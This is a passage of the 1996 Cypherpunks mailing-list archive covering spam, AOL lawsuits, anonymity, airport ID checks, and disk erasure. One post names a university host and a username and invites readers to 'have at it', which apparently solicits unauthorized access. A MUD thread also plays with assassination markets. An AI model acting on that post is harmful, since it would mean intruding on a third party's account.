the whole 9 YARDS!!!!!! Get a clue, delete or > killfile those who spam and keep the government out of > cyberspace!!!!!! > >> > Tell me about it. Im on AOL. 
WHO CARESSSSSSS if ya get one MAYBE two pieces > of mail you take LESS than a second to delete them both with the handy > delete key. These people are wasting more time complaining about it than they > will ever do actually deleting it. I don't use AOL and ask others not to use it because they practice censorship. (A service where one gets a TOS warning for saying "I'm horny!" in a chatroom desribed as "Gay&Lesbian Sex discussion" deserves to be boycotted.) However AOL would probably please their customers if it allowed them to filter their incoming e-mail according to user-specified rules. E.g., if you could choose to tell AOL that any incoming e-mail matching certain criteria should be dropped on the floor, at no cost to you, I'm sure a lot of AOL users would be very grateful and would use this feature. Ditto for other providers. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sat Sep 7 11:57:10 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 8 Sep 1996 02:57:10 +0800 Subject: Junk Phone Calls, Metered Usage, and Cellphones In-Reply-To: Message-ID: tcmay at got.net (Timothy C. May) writes: > The downside is that calls _from_ or _to_ my phone during "business" hours > are charged 42 cents a minute, airtime (tying up a channel and all), plus > whatever other fees may be applicable at each end. Thus, every "junk call" > I get trying to get me to buy aluminum siding, or to vote Democratic, or to > switch my long-distance carrier (!), costs me a minimum of 42 cents, > depending on how fast I can realize who they are and get rid of them ("Let > me forward you to Jim Bell's AP hotline..."). Wrong. It also costs your TIME. Junk e-mail takes TIME to recognize and delete. TIME (even Tim's time) costs more than 42c. 
> Needless to say, my cellular number is only going out to a handful of > folks, and with recommendations that they not call me during business hours > unless its urgent. I had an interesting conversation with a New York Daily News telemarketer a while ago. (Note that 1) I speak with a noteceable accent, 2) NYDN is a left-wing tabloid, generally marketed toward blue-collar/minorities.) RRing. DLV: Hello? NYDN: blah blah would you like to subscribe to New York Daily News? DLV: No thank you, I don't read your newspaper. NYDN: Well, you could at least look at the pictures . (Hung up on me before I did. :-) A few minutes later: RRing. DLV: Hello? NYDN: blah blah would you like to subscribe to New York Daily News? DLV: Someone just called a few minutes ago and I said I wasn't interested. Please don't call this number anymore. NYDN: I call every number in the exchange. We don't use a list for this. We don't do blocking. (Fortunately, they haven't called me since.) > These rates have really come down a lot. The unlimited calls is what sold me. As you yourself point out, their charging you for each incoming call during business hours is unacceptable. Why don't they bill the 42c / minute to whomever is calling YOU, as they do with LD and 900 numbers? --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jimbell at pacifier.com Sat Sep 7 12:10:34 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 8 Sep 1996 03:10:34 +0800 Subject: What the NSA is patenting Message-ID: <199609071627.JAA01473@mail.pacifier.com> At 12:18 AM 9/7/96 -0800, Adamsc wrote: >On Fri, 06 Sep 1996 11:59:18 -0500, John Deters wrote: > >>I hope some hardware hacker who knows their low-level stuff will be able to >>write a secure disk wiper. > >They have: it's called a bulk tape eraser. > > >I'd just store everything sensitive on a floppy. Those are easy to erase with a >heavy duty magnet (not a wimpy refrigerator magnet). 
I understand slagging one >in the microwave is also effective . Just remember that an AC-driven bulk eraser will be far more effective than a permanent magnet at erasing data securely. An oscillating magnet field re-magnetizes the floppy 120 times per second, as opposed to the single magnetization done by the permanent magnet. Each pass through the hysteresis curve brings down residual signals somewhat, maybe 10 db. With the AC field, it's hard NOT to have a good erase. Jim Bell jimbell at pacifier.com From dlv at bwalk.dm.com Sat Sep 7 12:38:57 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 8 Sep 1996 03:38:57 +0800 Subject: "The Bill of Rights can be dangerous...." In-Reply-To: Message-ID: <4X1VTD27w165w@bwalk.dm.com> tcmay at got.net (Timothy C. May) writes: > As with Adam Back's mini-rant yesterday, this is exactly correct. In a free > society, speech need not be approved, registered, escrowed, labelled, or > identified with the Registered True Name of the speaker. But the U.S. is not a "free society". Tim yaks at those who criticize his beloved United States for not being "polite". Tim is wrong. > "Books and magazines can be dangerous [bomb recipes, racial hatred, > instilling bad values, etc.]-- as can restrictions on reading, especially > in/by repressive regimes. Therefore I would favor allowing unfettered > reading -- with some form of traceability only under terms considerably > stronger than what are generally required for a wiretap." > > (i.e., "book escrow," where one's reading materials are escrowed with > Trusted Authorities, and only accessed by law enforcement under Proper > Conditions. Failure to escrow reading materials would be a Class B felony. > Cf. the FBI's Library Awareness Program of circa 1987-8.) 
I remember being surprised to discover that the library computer at City University of New York (state school where I got all my degrees) had an (easily accessible) record of every book I've ever checked out in some 15 years. And by the way you need to present A LOT of ids to take books out of New York's public libraries, or to use the public-access computers in them. And by the way you're asked to sign your name and affiliation (fortunately, no ID is required) if you want to just enter NYPL's Slavic division and use their reading room. Apparently this was instituted during the cold war under the assumption that anyone interested in Slavic Division's materials needs to be watched. > "People moving around can be dangerous [avoiding parental responsibilities, > avoiding taxes, spying, plotting to bomb buildings]-- as can traceability, > especially in/by repressive regimes. Therefore I would favor allowing > freedom of movement -- with some form of traceability only under terms > considerably stronger than what are generally required for a wiretap." > > (a la the "position escrow system" I predicted a couple of years ago would > someday be seriously considered) Have you tried to get on an airplane lately? I just had to present my driver licence (work id w/ picture wouldn't cut it!) to get on. I understand John Gilmore got himself arrested for refusing to identify himself. As he said, there used to be a 200-year precedent that a citizen can travel within the country without having to identify himself. Shit, I used to fly under phoney names - can't do this anymore. > A version for anonymous purchases and sales: > > "Anonymity in sales and purchases can be dangerous [bomb materials, stolen > goods, unhealthful foods, etc.] -- as can traceability, especially in/by > repressive regimes.
Therefore I would favor allowing anonymous purchases > and sales of goods -- with some form of traceability only under terms > considerably stronger than what are generally required for a wiretap." > > (There go the flea markets and garage sales (for buyers), which are largely > anonymous. There goes walking into a store and paying cash for a piece of > pipe (could be made into a bomb). There goes cash, period. See next item.) A very good friend of mine does EE for a living, and in particular he sells some EE equipment by mail order. He told me that every time he sells something like the gizmo to write magnetic strips on credit cards, he gets a phone call from los federales saying: you sold X who paid with Y and shipped it to address Z - do you have any additional details? He says every time they know as much about the sale as he does. :-) > A version for cash: > > "Cash can be dangerous [illegal purchases, drugs, prostitution, tax > evasion, illegal workers, extortion, etc.] -- as can traceable money, > especially in/by repressive regimes. Therefore I would favor allowing cash > -- with some form of traceability only under terms considerably stronger > than what are generally required for a wiretap." That's why any time you attempt a cash transaction for over 10K (buying a car, depositing it in a bank, etc), you will, by law, be reported to the IRS, who will take a close look. I can't recall the name of the guy who tried to take over 10K of cash out of the country without declaring it, was searched, was caught, and is currently in jail. > And so on. One can take Dyson's basic argument for why anonymity may be > dangerous at times and why it may need to be restricted, limited, or > banned, and use these arguments for a variety of other basic freedoms. > Essentially, freedom can be dangerous. The world can be dangerous. In fact, > it is. As I told John Gilmore: I've known Esther Dyson for some time before she got involved with EFF. 
I consider her a very nice person, and admire her activities in Eastern Europe and elsewhere (and am in particular thankful for her help on my past projects). I suspect that Esther simply didn't think enough about this question before saying what she was quoted as saying... I hope Esther will research the issue further, and knowing her pro-liberty record, I'm sure she will see the value of absolutely untraceable anonymity. (Likewise I have great respect for Dr. Dorothy Denning, with whom I had a very interesting conversation yesterday. She showed me situations where GAK (or generally employer access to keys) makes sense - not when it's used by folks not affiliated with the government or the employer, of course.) From johnbr at atl.mindspring.com Sat Sep 7 12:40:36 1996 From: johnbr at atl.mindspring.com (John Brothers) Date: Sun, 8 Sep 1996 03:40:36 +0800 Subject: Metcalf and Other Net.Fogies Message-ID: <1.5.4.32.19960907164630.006d211c@pop.atl.mindspring.com> At 11:17 AM 9/7/96 -0400, perry at piermont.com wrote: > > > >I'm "involved with the problems" too, you know. Don't teach granpaw to >suck eggs. OF COURSE there are problems. None of them, however, are >signs of "collapse". This whole thing makes me ill - maybe I'm just an idiot. What could possibly cause a collapse? More usage?? No - that would just mean that everyone's access would be slower. Do routers fail because they can't talk to other routers? no - they route around it. I consider myself reasonably educated when it comes to the layout of the internet, and I have never heard _anyone_ ever say what constitutes a collapse, and, if it means 'catastrophic permanent failure of the Internet', what could possibly cause that. These people are acting like one day, something is going to blow up, and the entire internet will follow, and stay down for a long long time. If all the DNS servers died, the internet would stop working for non-local access until they recovered.
If there was a bug in Cisco routers that was set to go off on Thursday, September 12th, that would render them inoperable until power cycled, that would cause a major failure. If every building in MCI and Sprint's data network blew up, that would cause a major failure. If the usage increased so that the Internet was 'saturated', that doesn't qualify as a collapse. It qualifies as 'rush hour'. If the internet was in 'rush hour' 24 hours a day, it would be unfun to use, but unlike the highway system, we can add more lanes pretty much at will. (within reason). Will someone please explain to me what I'm missing? Thanks John --- John Brothers Do you have a right not to be offended? From attila at primenet.com Sat Sep 7 12:53:55 1996 From: attila at primenet.com (attila) Date: Sun, 8 Sep 1996 03:53:55 +0800 Subject: [RANT] Death of Usenet: Film at 11 Message-ID: <199609071720.LAA29986@InfoWest.COM> In Cypherpunks, on 08/19/96 at 01:34 PM, mpd at netcom.com (Mike Duvos) said: =If Singapore bans alt.sex.hooters, you could simply post to =alt.culture.singapore.i.got.your.hooters.right.here. [snip] =It would also send the correct message that "newsgroups" are simply =one of many labels on an article, and are not cyberspacial tearooms =where bad people congregate and there is guilt by association. I don't fault your argument on "sending the correct message," but since when has an oppressive government ever been concerned with "the correct message?" LEA's could care less about the message; their only interest is another opportunity to behave like the jack-booted thugs they generally are. but public opinion, certainly the government interests in control, have already determined in the court of small minds that "we" are inherently evil (and beyond redemption without coercion). A repressive government can not afford publications from unredeemed (and unrepentant) cyber-anarchists with a world wide audience. 
Is the daily comics the last refuge of freedom; witness today's "Thatch:" "cubicle cliches are one of the few things we all share; they're one of the few things that unite us as americans!" "that and utter, corrosive contempt for our elected officials." sarcasm has always been a potent weapon, and one of the hardest to silence. ..in bits and pieces it can slowly undermine the target. why is it tolerated? I'm sure our malicious uncle wanted to shut Doonsbury down during Vietnam, but joe-six-pack rarely understood the underlying message. =The alternative to doing something reasonable like this is probably =to see mass migration from "banned newsgroups" to off-topic groups, =like Lolita pictures in rec.pets.cats, when the inevitable crackdown =comes. has not the crackdown arrived? and are not the various skirmishes between governments on one side and the ISPs & users on the other sufficient evidence of governmental intentions? =As long as people can post =anonymously, they will simply switch to another existing newsgroup =when the one they are posting to becomes blocked. Once the =inevitable reciprocal pissing contest between posters and censors =gets going, Usenet as we know it will likely be destroyed. let's put it this way, the first reaction will be to "eliminate" the anonymous remailers, then ban the "alt" groups which can be created at will. if there is migration from alt.sex.binaries to rec.cats, the government will eliminate the entire usenet and we will be forced back to the NWO controlled media conglomerates, or mail lists. of course, then the fascists will block or close down the list servers on some flimsy pretext such as violating the US postal monopoly and regulations.... Many companies block the alt groups; 15 years ago, even I blocked the alt groups during business hours (and usenet was only 1.5 MBytes per day then!), restoring them at 1800. --why? 
because the office staff spent *at least* all morning reading usenet, occasionally even refusing to talk to customers before their daily dose! My point is simple: I reacted by limiting the **time** of access, ** not access itself. ** On the other side, Reed, Buchannan &c. have decided *they* should judge what is fit (G rated) for our consumption; and, of course, Big Brother has determined they should be the judge of political correctness and all that shit which is numbing the minds of joe-six-pack until America is a controllable homogeneous bowl of putrid gruel. government, in and of itself, may be able to selectively prosecute cyberspace "violaters," but the real danger is big business. Print newspapers receive $64 billion in ad revenue, 80% of which is local. Virtually every major US newspaper (most owned by the group of 5) has a net presence --some very informative. And, even Mexico has more than a dozen of their papers on line. However, in the US the news is still the same collection of what the NWO wants us to hear/see. So far, the foreign press is not so inhibited and is often openly critical of US bumbling in foreign affairs, Bubba's alleged (alledged?) cocaine habit and criminal behaviour, --likewise critical of all fools. Where does this lead? Well, we've probably peaked on freedom; the rest is downhill as our "non-elected" government degenerates to deploying more and more thought control to maintain the oligarchic fascist form of what Jefferson thought they were creating as a representative republic. I for one enjoy tweaking their nose, but it only stiffens their resolve to squash me/us/whatever. How do you show resolve without being in their face? most regulation is created to "eliminate" abuse of a "public" privilege; unfortunately, we all suffer "collateral damage" to use their term. does voluntary compliance work? unfortunately, no. where does that leave us? confrontation, I guess. preserve our advantage as long as we can. 
we all know from münchen that Clement Attlee made a fool of himself appeasing Hitler for a false peace. might as well carry on with what we do best: rape, pillage, and burn... a scorched earth policy.... From ravage at einstein.ssz.com Sat Sep 7 12:58:38 1996 From: ravage at einstein.ssz.com (Jim Choate) Date: Sun, 8 Sep 1996 03:58:38 +0800 Subject: "The Bill of Rights can be dangerous...." (fwd) Message-ID: <199609071749.MAA01561@einstein> Hi all, Forwarded message: > Subject: Re: "The Bill of Rights can be dangerous...." > From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) > Date: Sat, 07 Sep 96 09:35:38 EDT > > I remember being surprised to discover that the library computer at City > University of New York (state school where I got all my degrees) had an > (easily accessible) record of every book I've ever checked out in some > 15 years. And by the way you need to present A LOT of ids to take books > out of New York's public libraries, or to use the public-access > computers in them. And by the way you're asked to sign your name and > affiliation (fortunately, no ID is required) if you want to just enter > NYPL's Slavic division and use their reading room. Apparently this was > instituted during the cold war under the assumption that anyone > interested in Slavic Division's materials needs to be watched. In the very early 80's while I was attending UT Austin the FBI approached the libraries and requested access to the loan records. The libraries refused and went so far as to post a warning at each of the book checkout points on the event. Personally, I was very proud of them for the refusal and the extra step of the warning. > A very good friend of mine does EE for a living, and in particular he > sells some EE equipment by mail order. He told me that every time he
He told me that every time he > sells something like the gizmo to write magnetic strips on credit cards, > he gets a phone call from los federales saying: you sold X who paid with > Y and shipped it to address Z - do you have any additional details? He > says every time they know as much about the sale as he does. :-) I have been dealing with security electronics for over 10 years and have never been approached by anyone regarding my activities. I make no secret of the fact that I do that sort of work as well as being able to build custom equipment if needed. I would suspect that there is a flag on your friend for something or someone from the past, not on his business in particular. Jim Choate CyberTects ravage at ssz.com From attila at primenet.com Sat Sep 7 13:15:07 1996 From: attila at primenet.com (attila) Date: Sun, 8 Sep 1996 04:15:07 +0800 Subject: Choice of Words Message-ID: <199609071742.LAA00692@InfoWest.COM> > --Tim May, who hopes he is never identified as the "John Doe" indicted, > tried, convicted, and sentenced in 1979 in Washington County, Oregon, for > the crime of unlawful foddering in a public place. > foddering? why, are you an indiscreet luncher? > Boycott "Big Brother Inside" software! > We got computers, we're tapping phone lines, we know that that ain't allowed > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Licensed Ontologist | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." -- one of the few things we all share: the utter, corrosive contempt for our elected officials. From roy at sendai.scytale.com Sat Sep 7 14:12:29 1996 From: roy at sendai.scytale.com (Roy M. 
Silvernail) Date: Sun, 8 Sep 1996 05:12:29 +0800 Subject: Anonymous phone calls (was: What is the EFF doing exactly?) In-Reply-To: <9608068420.AA842029748@smtplink.alis.ca> Message-ID: <960907.130338.3j4.rnr.w165w@sendai.scytale.com> In list.cypherpunks, jbugden at smtplink.alis.ca writes: > There is another spin possible on the reasons for replacement of > pay phones with credit card phones. In Canada all new credit card > phones are also able to take phone cards (which are anonymous). > > Using a prepaid phone card permits full anonymity. But what it also > permits is metered local calls. This infrastructure would be more > familiar to someone from Europe where metered local calls are the > norm. In Minneapolis, USWest has Telecard phones everywhere, and vending machines with bill accepters. The calls are also flat rate at $0.25. Beware using the Telecard for a long distance call. I did one from Seattle to Mpls and it was something like $3.65 for the initial charge. Can Telecards be audited for usage? If a TLA black-bags my $25 Telecard from my wallet, can they reconstruct what calls I made with it? -- Roy M. Silvernail [ ] roy at scytale.com PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at scytale.com From kermit69 at 10mb.com Sat Sep 7 14:17:45 1996 From: kermit69 at 10mb.com (Kermit69) Date: Sun, 8 Sep 1996 05:17:45 +0800 Subject: Have at it. Username provided Message-ID: <3231C53E.21B4@10mb.com> Hey. Try this, whitman.gmu.edu a username = myost From vznuri at netcom.com Sat Sep 7 14:46:01 1996 From: vznuri at netcom.com (Vladimir Z.
Nuri) Date: Sun, 8 Sep 1996 05:46:01 +0800 Subject: Junk Phone Calls, Metered Usage, and Cellphones In-Reply-To: Message-ID: <199609071839.LAA12411@netcom3.netcom.com> TCM: >Relevance to Crypto? The "junk e-mail" issue, calls for regulations (which >I'm against), technological solutions (Caller ID lets users decide to >accept a call or not....same idea could be used with e-mail, a la Hal >Finney's "You have a message of size X from size Y entitled Z" proposal for >positive acceptance of remailed messages), and the value of True Names (and >True Numbers). more and more I think the problem of "junk info" which we keep running into on this list is of key importance to future information technologies. loosely translated, I would call this the same problem that rears its head in many different information transfer formats. spam in newsgroups, junk mail in the email box, sales calls on the phone. can it be solved? caller ID is in one sense a solution to this problem. I suspect we will be seeing increasingly sophisticated solutions. in short, imagine a communication system with various entities. this could be a newsgroup, a phone system, an email system, etc. the fundamental problem is allowing the transfer of information that is "approved" by consenting parties, and rejecting the transfer of information (and preventing denial-of-service attack) for anything otherwise. a very tricky problem, because the value of information is subjective in the eyes of sender and receiver, and often people want to receive information and cannot tell whether they want it or not until they see it. for cpunks, there are additional goals. ideally pseudonymous communication or anonymous communication would be allowed. for the phone problem, one possible way of solving this is to have passwords. in addition to giving out your cell phone number, you give the person a digital password. you are free to vary this password yourself for multiple entities.
they have to enter the right password for the call to go through (or for any charges to accrue). if you get junk calls, you at least know the individual password that was "compromised". you can reject that password in the future as being "dirty" and hand out a new password via your trusted channels to anyone who tells you they can't get through to you any more (and you don't necessarily want that to stay that way ). this system is remarkably similar to the way that intelligence agencies work, with their agents and spies. they deal with the problem of knowing which channels have been "compromised" and working with countermeasures. in fact I suspect that the intelligence community has developed very sophisticated ways of dealing with information transfer and "spoofing" (bad data so to speak) that might have major applications to the design of future cyberspace. such a system could be applied to email. I send out email passwords to my trusted associates (they might even be included in the email address itself). email that doesn't have a proper password I could either delete or put into the "low priority" bin. unfortunately this restricts email whereas one of the great aspects of email is its lack of controls and preventions in contacting people. but notice that one could still have a lot of relative freedom in this system. suppose that I gave a lecture to a large audience of people. I could then create a new password for that audience, and release it to them. if I get email under that password, I know it was somehow from someone in that audience, and it would be worth more to my attention, so to speak, than junk email. it has slightly more value than being totally "out-of-the-blue anonymous". if the address became too popular, or got into the hands of a marketer, I could hook it up to a form letter or disconnect it. in a sense this would be like something like having the ability to create or disconnect multiple phone numbers whenever you want. 
I suspect such systems will become more prevalent in the future. whenever you interface with other people, you will be given the opportunity to put it under your own personal "information channel" of choice. "inquiries on this subject should be addressed to [x]".

a similar mechanism is used by advertisers to gauge the efficacy of their advertising. they say in the ad, "mention this ad to get [x]". this is setting up an independent information channel for identification. they also might set up a separate phone number for a given advertisement, and see how much traffic they get through that phone number independently. all this is invisible to the customer.

the "junk info" problem becomes much more difficult to solve with public forums such as newsgroups, and the above approach would not seem to apply. others have proposed solutions that are related to packaging money in messages. "I will pay you 5 cents to read this message" which can be collected upon opening it. a very interesting proposal I think we will see actually put into practice.

I suspect we will continue to see interesting innovations that focus on the problems of information dissemination. it's amazing how far we are into the information age without some key problems being solved yet. plenty of room for some innovative thoughts. I continue to believe there are some elegant solutions waiting to be found.

From declan at eff.org Sat Sep 7 15:04:23 1996
From: declan at eff.org (Declan McCullagh)
Date: Sun, 8 Sep 1996 06:04:23 +0800
Subject: Court challenge to AOL junk-mail blocks
In-Reply-To: <199609070316.XAA13685@yakko.cs.wmich.edu>
Message-ID:

If AOL wants to stop spammers, let them. They have every right to do so as long as their agreement with their customers permits it. It's a matter of contract law between AOL and its customers and should not involve the spammers and a lawsuit brought by the spammers.

It seems as though the judge was snookered by the spammers' claim of U.S.
Mail-like service, free speech, blah. The right to free speech does extend to corporations; in that way, it includes the right *not* to speak.

-Declan

On Fri, 6 Sep 1996, Damaged Justice wrote:

>
> This is utter horseshit. AOL, like any private individual or organization,
> has the right to refuse service to anyone at any time for any reason, or
> even for no reason at all. The gubmint isn't doing SQUAT, except forcing
> AOL to allow the spammers access.
>
> --
> http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
> Hey, Bill Clinton: You suck, and those boys died! I hope you die!
> I feel a groove comin' on $ Freedom...yeah, right.
>
>

// declan at eff.org // I do not represent the EFF // declan at well.com //

From jimbell at pacifier.com Sat Sep 7 15:05:05 1996
From: jimbell at pacifier.com (jim bell)
Date: Sun, 8 Sep 1996 06:05:05 +0800
Subject: MUD anyone?
Message-ID: <199609071920.MAA08949@mail.pacifier.com>

At 10:06 AM 9/1/96 +0000, Rev. Mark Grant wrote:
>On Tue, 27 Aug 1996, Jon Leonard wrote:
>Protection Agencies
>Escrow Agencies
>Private Law Courts (probably controlled by players rather than the computer)
>Reputation Agencies
>
>> What am I missing? Should there be direct support for Jim Bell's
>> assassination markets? It'd provide a means of demonstrating its
>> ineffectiveness as a means of social control.
>
>I think it should be incorporated, but I think that people can set them up
>easily themselves. Perhaps we should have an NPC-run 'Assassins Inc' which
>would run the lottery, and then players could do the actual 'wet work'.
>
>But yes, I'd really like to see how this would work in the game. As I
>said I'm thinking of this more as a semi-scientific experiment than a
>pure game. We have some idea of how this stuff should work in theory, but
>little of how it works in practice.
>
>I do think though that we'd have to enforce some kind of rule against
>'disposable characters', otherwise people could simply create a new
>character every time they were killed trying to assassinate someone. There
>would need to be some disadvantage to just going in guns-blazing and being
>killed ten times in a row.

Wouldn't it be more realistic if instead of representing individual characters, you created composites which had a "weight" based on how many of them exist in the country/world? For example, the character "buggy-whip maker" in 1900 would be weighted in the thousands, while his number would be drastically reduced a few decades later.

This would avoid the "going in with guns blazing" scenario, or at least it would put it into perspective: the number of assassins would drop by "1" (or some proportion) if that happened, although correspondingly the number of targets would also drop.

With this system, a character would never die, but his number would simply drop to an insignificant quantity. ("Government-thugs" comes to mind...) And that's not the only reason the number of characters would drop: If it suddenly became "unhealthy" to accept a public paycheck, and thus the risk wasn't matched by the rewards, presumably people would shift professions. Again, this would all be part of the simulation.

Jim Bell
jimbell at pacifier.com

From adam at homeport.org Sat Sep 7 15:05:21 1996
From: adam at homeport.org (Adam Shostack)
Date: Sun, 8 Sep 1996 06:05:21 +0800
Subject: "The Bill of Rights can be dangerous...."
In-Reply-To: <4X1VTD27w165w@bwalk.dm.com>
Message-ID: <199609072038.PAA10538@homeport.org>

I got on four separate airplanes with a work ID in late August. All you need to do is ask for the manager, and ask to see where in the contract it says Government issued ID. Air tickets come with about 300 pages of contract included by reference. Nowhere in those contracts is anything about government ID.
I was told once that it was a secret FAA regulation that I wasn't allowed to see. After I saw it the women got really adamant that I couldn't see it in context, nor find out what regulation it was part of. (I saw, but did not get to keep, about 12 lines of dot matrix printed text on computer paper.)

The words to use to get on a plane seem to be breach of contract, with managers.

Adam

Dr.Dimitri Vulis KOTM wrote:
| > "People moving around can be dangerous [avoiding parental responsibilities,
| > avoiding taxes, spying, plotting to bomb buildings]-- as can traceability,
| > especially in/by repressive regimes. Therefore I would favor allowing
| > freedom of movement -- with some form of traceability only under terms
| > considerably stronger than what are generally required for a wiretap."
| Have you tried to get on an airplane lately? I just had to present my
| driver licence (work id w/ picture wouldn't cut it!) to get on. I
| understand John Gilmore got himself arrested for refusing to identify
| himself. As he said, there used to be a 200-year precedent that a
| citizen can travel within the country without having to identify
| himself. Shit, I used to fly under phoney names - can't do this anymore.

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From rodger at interramp.com Sat Sep 7 16:12:05 1996
From: rodger at interramp.com (Will Rodger)
Date: Sun, 8 Sep 1996 07:12:05 +0800
Subject: Court challenge to AOL junk-mail blocks
Message-ID: <1.5.4.32.19960907204437.0068b4d8@pop3.interramp.com>

At 12:27 PM 9/7/96 -0700, Declan McCullagh wrote:
>If AOL wants to stop spammers, let them. They have every right to do so as
>long as their agreement with their customers permits it. It's a matter of
>contract law between AOL and its customers and should not involve the
>spammers and a lawsuit brought by the spammers.
>
>It seems as though the judge was snookered by the spammers' claim of U.S.
>Mail-like service, free speech, blah. The right to free speech does
>extend to corporations; in that way, it includes the right *not* to speak.
>

Declan raises a good point. But I'm guessing it's a bit more complex than that. CyberPromo and AOL lawyers tell me the court slapped down AOL simply to "keep the status quo." Both sides used those very words, in fact.

What's more, CyberPromo talks a good game on the First Amendment, but used computer fraud and unfair competition statutes - not the Bill of Rights - in its original filing against AOL. So what's going on?

It seems Weiner is _very_ aware that this case deals with things never before argued in court. No one has really sorted out just how much e-mail - if any - an ISP is obligated to carry against its wishes. What Weiner decides this fall may not set the kind of precedent that the case of the Pentagon Papers did, but will be important for a while at least.

Will

From pstira at escape.com Sat Sep 7 16:19:15 1996
From: pstira at escape.com (pstira at escape.com)
Date: Sun, 8 Sep 1996 07:19:15 +0800
Subject: Deleted Message (fwd)
Message-ID:

One must wonder about these military types. Hm...
-millie

---------- Forwarded message ----------
Date: Sat, 7 Sep 96 16:50:21 -24000
From: MAILER-DAEMON at mqg-smtp3.usmc.mil
To: pstira at escape.com
Subject: Deleted Message

To: "Gary Howland"
From: MQG-SMTP3 at USMC_MASTERINET@Servers[]
Subject: Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
Message in Transport deleted by:
ADMINISTRATOR at USMC_MASTERINET@Servers

From froomkin at law.miami.edu Sat Sep 7 16:31:57 1996
From: froomkin at law.miami.edu (Michael Froomkin - U.Miami School of Law)
Date: Sun, 8 Sep 1996 07:31:57 +0800
Subject: Anonymity and free speech
In-Reply-To: <1.5.4.16.19960903035433.37773f1a@mail.io.com>
Message-ID:

Interested readers are invited to see that the issues are complex by looking at: http://www.law.miami.edu/~froomkin/articles/oceanno.htm

On Mon, 2 Sep 1996, Greg Broiles wrote:

>
> Instead of discussing whether or not Esther Dyson or other EFF board members
> are personally comfortable with anonymity, let's talk about whether or not
> the EFF and its board members believe that the First Amendment provides a
> right to speak and associate anonymously. (I believe that the First
> Amendment gives everyone the right to wear a t-shirt which says "I am an
> asshole." But I have no interest in wearing such a t-shirt. And so on.)
>
> I believe that it does, and that the Supreme Court has already made that
> clear. In particular, I'm thinking of _NAACP v. Alabama
> ex rel Patterson_, _Talley_, and _McIntyre v. Ohio Elections Commission_.
> (Sorry for the lack of cites; 95% of my stuff is still in boxes and I'm
> sending this via laptop and a Ricochet modem.)
>
> If the right to speak/associate in "real life" is protected by the First
> Amendment, I don't see why it wouldn't be on computers and networks which
> are located inside the United States. And if that right is based upon the
> Constitution, it will take a constitutional amendment or a big sea change in
> the Supreme Court to take it away.
> (I wonder if the decision in _McIntyre_ would have gone the other way if Ms.
> McIntyre were selling drugs via anonymous message pools instead of
> discussing school funding via windshield flyers.) Discussions about the
> utility of anonymity would be more useful if we were designing a
> communication system or a constitution from scratch; but that's not our
> current situation. Is there serious debate about whether or not the
> Constitution and the Internet allow anonymous communication? (I'm not asking
> a rhetorical question. If someone's familiar with an argument to the
> contrary, please tell me about it.) Both the Constitution and the Internet
> are difficult to modify quickly; we probably have anonymity (like it or not)
> for at least a few more years.
>
> (I'm not trying to imply that US law is the only law, or that the rest of
> the world doesn't exist. But I don't know poo about the right to anonymity
> in other nations; and to a certain extent anonymity anywhere on the Internet
> is the same as anonymity everywhere on the Internet. Are other readers aware
> of other jurisdictions where anonymous speech is considered a right?)
>
> ----
> Greg Broiles
> gbroiles at netbox.com
> http://www.io.com/~gbroiles
>

[This message may have been dictated with Dragon Dictate 2.01. Please be alert for unintentional word substitutions.]

A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law | froomkin at law.miami.edu
P.O. Box 248087 | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here. And #@&*! humid.

From jfricker at vertexgroup.com Sat Sep 7 16:42:40 1996
From: jfricker at vertexgroup.com (John F.
Fricker)
Date: Sun, 8 Sep 1996 07:42:40 +0800
Subject: What the NSA is patenting
Message-ID: <2.2.32.19960907212748.00ada824@vertexgroup.com>

At 02:03 PM 9/6/96 -0700, you wrote:
>At 12:50 AM 9/7/96, Jean-Francois Avon wrote:
>>A maybe useful program would be a little tsr that constantly
>>overwrites unused sectors of the entire drive with random patterns
>>(maybe seeded with a fast keyboard interval timer). Like at the very
>>moment I am writing this, my HD has been idle for several minutes...
>>
>
>
>The NSA STM method is related to reading _very subtle_ variations in
>magnetic domain modifications. Jitter in read-write head positions can be
>thought of as a noise (N) added to some signal (S). Extraction of signals
>in low S/N ratio environments is a well-developed science.
>

This excerpt from a Wired article/interview
http://www.hotwired.com/wired/3.10/departments/electrosphere/data.html

"No data is totally safe," says Sharp, who runs his Data Recovery Labs from the coincidentally named town of Safety Harbor, Florida. "But you can recover data that's been overwritten up to nine times. The only way to permanently remove data is with programs that can do a 'severe security erase,' when the drive is over-written 10 consecutive times."

Believe it or don't!

From m5 at vail.tivoli.com Sat Sep 7 16:51:00 1996
From: m5 at vail.tivoli.com (Mike McNally)
Date: Sun, 8 Sep 1996 07:51:00 +0800
Subject: What the NSA is patenting
In-Reply-To: <2.2.32.19960907212748.00ada824@vertexgroup.com>
Message-ID: <3231EFAB.1A24@vail.tivoli.com>

John F. Fricker wrote:
>
> This excerpt from a Wired article/interview
> http://www.hotwired.com/wired/3.10/departments/electrosphere/data.html
>
> "No data is totally safe," says Sharp ...

That entire article struck me as a load of hogwash the first time I read it. This Sharp dude rehashed several old fairy tales about data recovery.
______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
m5 at tivoli.com * m101 at io.com * * three heads and eight arms.

From charlee at netnet.net Sat Sep 7 16:54:40 1996
From: charlee at netnet.net (kickboxer)
